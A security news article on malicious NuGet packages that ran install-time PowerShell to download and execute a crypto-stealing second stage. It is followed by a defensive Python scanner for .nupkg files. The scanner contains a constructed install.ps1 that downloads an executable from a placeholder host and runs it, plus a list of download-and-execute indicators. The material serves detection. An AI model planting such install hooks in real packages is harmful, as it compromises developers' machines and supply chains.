Attackers have been observed using the open source package manager NuGet to create malicious packages that target .NET developers.
According to JFrog, a software package management company, this discovery represents the first instance of a package containing malicious code found on NuGet.
As Shachar Menashe, senior director at JFrog Security Research, explains: “This proves that no open source repository is safe from malicious actors.”
Read more about malware targeting open source repositories here: Researchers Uncover 700+ Malicious Open Source Packages
According to an advisory created by JFrog security researchers Natan Nehorai and Brian Moussalli, the package was downloaded 150,000 times in the past month.
“[They] contained a ‘Download & Execute’ type payload [...] a PowerShell script that runs during installation that triggers the download of a remotely executable ‘second stage’ payload. The second-stage payload is a custom, more sophisticated executable,” Nehorai and Moussalli wrote.
The second-stage payload offers several features, including a crypto stealer, an Electron archive extractor (which also supports code execution), and an automatic updater.
In the advisory, JFrog security experts said they contacted NuGet admins and were told the team was aware of the malicious packages and removed them.
Still, Menashe said .NET developers remain at risk of malicious code, because NuGet packages retain the ability to execute code when a package is installed.
“Even if a guilty malicious package [...] even with its removal, .NET developers using NuGet are still at high risk of malicious code infecting their environment,” the executive added. “Care must be taken when curating open source components for use in builds and at all stages of the software development lifecycle to ensure a secure software supply chain.”
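To make the install-time risk described above concrete, here is an added example (not code from JFrog's advisory or the NuGet project) that opens a .nupkg, lists the files NuGet treats as install-time or build-time code, and flags download-and-execute cmdlets in tools/*.ps1 scripts. The package, the script contents and the URL are constructed placeholders.

```python
import io
import re
import zipfile

# Paths NuGet honours as code: PowerShell scripts under tools/ (run by Visual
# Studio's Package Manager Console for legacy packages.config installs; ignored
# for PackageReference) and MSBuild .targets/.props under build*/ (imported
# into every build of the consuming project).
SCRIPT_RE = re.compile(r"^tools/(init|install|uninstall)\.ps1$", re.IGNORECASE)
MSBUILD_RE = re.compile(r"^build(transitive)?(/[^/]+)*/[^/]+\.(targets|props)$",
                        re.IGNORECASE)

# Download-and-execute indicators (matched case-insensitively as substrings).
INDICATORS = (
    "invoke-webrequest", "downloadstring", "downloadfile", "net.webclient",
    "invoke-expression", "iex ", "start-process", "-encodedcommand",
)

def scan_nupkg(data: bytes) -> dict:
    """Map each install/build-time code carrier in the package to its indicators."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            norm = name.replace("\\", "/")
            if SCRIPT_RE.match(norm):
                text = z.read(name).decode("utf-8", errors="replace").lower()
                findings[norm] = [i for i in INDICATORS if i in text]
            elif MSBUILD_RE.match(norm):
                text = z.read(name).decode("utf-8", errors="replace").lower()
                findings[norm] = ["exec task"] if "<exec " in text else []
    return findings

def build_sample(script: str) -> bytes:
    """Constructed .nupkg (a zip) with a minimal nuspec and one tools/install.ps1."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("example.nuspec",
                   "<package><metadata><id>example</id></metadata></package>")
        z.writestr("tools/install.ps1", script)
    return buf.getvalue()

# Constructed stand-in for the pattern in the advisory (placeholder URL, never
# fetched here): the install script pulls a second stage and runs it.
SUSPICIOUS = ("param($installPath, $toolsPath, $package, $project)\n"
              "$u = 'https://PLACEHOLDER.invalid/stage2.exe'\n"
              "Invoke-WebRequest -Uri $u -OutFile \"$env:TEMP\\s2.exe\"\n"
              "Start-Process \"$env:TEMP\\s2.exe\"\n")
BENIGN = "param($installPath, $toolsPath, $package, $project)\nWrite-Host 'ok'\n"

if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, scan_nupkg(build_sample(script)))
```

A package whose scan returns any carrier with a non-empty indicator list, or any tools/ script at all for a project that does not expect one, deserves manual review before it is allowed into a build.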
For additional information on securing open source software, see this analysis by Amanda Brock, CEO of OpenUK.